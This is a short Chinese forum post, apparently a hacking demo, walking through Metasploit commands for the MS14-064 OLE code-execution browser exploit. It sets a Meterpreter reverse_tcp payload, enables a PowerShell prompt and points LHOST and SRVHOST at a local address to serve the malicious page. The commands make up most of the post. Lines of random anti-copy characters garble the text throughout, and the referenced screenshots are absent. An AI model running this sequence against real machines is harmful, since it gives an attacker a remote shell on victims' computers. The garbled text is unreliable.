% V, ?* _" h! | p$ L 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
3 h3 B- Z9 d# h
2 c$ A9 |/ ~! b z
7 d& k5 i8 j9 E" ~: i0 G
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
8 {; M {! L3 U9 x/ k' U
! P, ]! k# d' g
: \* j: ?4 W! e' P 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp U' \/ e2 H5 H* x' B7 d0 |
& {0 ^' g$ |7 }+ l6 K5 @, S6 _$ p6 A7 u* h7 j' ?/ U" S7 K+ Y$ d
set AllowPowershellPrompt true
' h' O; T# }+ ?3 |- b7 a7 w' T
; @8 z8 q1 q' c$ [# E$ {
: H- J9 n3 Z& E: B5 e
Set LHOST 192.168.0.109
' m) x0 n/ }7 @
% }' [+ G! w0 F8 ]+ H* L( Y1 f7 O3 H) Z
set SRVHOST 192.168.0.109
4 [$ T0 Z1 X% B6 ]
. `4 l9 S: G) w N2 S( e- {: @ l; i* g! Y3 [" U4 e# [3 X
Set uripath share
+ |& u7 g% ^$ H `+ n0 D5 a
' b; _6 T7 L+ L; ]( D& a& i# H
) A, F5 k4 p# K0 e$ e
Set srvport 80
. g# D7 |, m+ T& {9 F8 N
7 e$ \2 \: U6 [* {; A) Y9 O
, T6 u( S! t& e( E8 S+ T0 f: H, ~6 C
2 X5 `$ i" U5 X8 b( {
0 g2 H( M( o2 S, G, ]/ x0 ~5 \2 q1 j7 p* [# ^8 K" X
; f0 l, T- k! |
! S$ s$ w$ n6 ~6 S7 R( O+ E+ j9 _9 `5 m9 h
2 K) o2 u/ @# G8 F2 o: R% s. ]
: R% ~+ \$ F6 h. ~: n. I1 z
& b5 _' a0 m: V' T+ G4 ` : v2 U9 s8 T% \4 Q9 N- C _
9 j" U0 @ X# p/ }5 R
* v3 H8 p" i- q7 F) H q$ C B
! P" G4 g; v4 |
7 n8 V; I# \. O1 o) e }$ f
- a `. D2 l7 d! z, r 下面我们来访问本地地址如图:; V6 p+ R5 J) h" ^+ g
3 i2 K5 n7 w1 B2 f( o4 Z
& T+ [7 L+ m' w" d& H# r
! T; z& f9 L0 v
2 {* f K+ H# |6 T, V- R# E) ]) d3 x; X9 u1 p% y; {5 x8 G
# |+ e* [/ p' C- z4 f5 M P9 `7 c
4 M; v! V+ t' b. d3 e( A
# ~# a* B. U* ?1 }' r ; \. }$ u% W, n, M& v0 k' j0 ]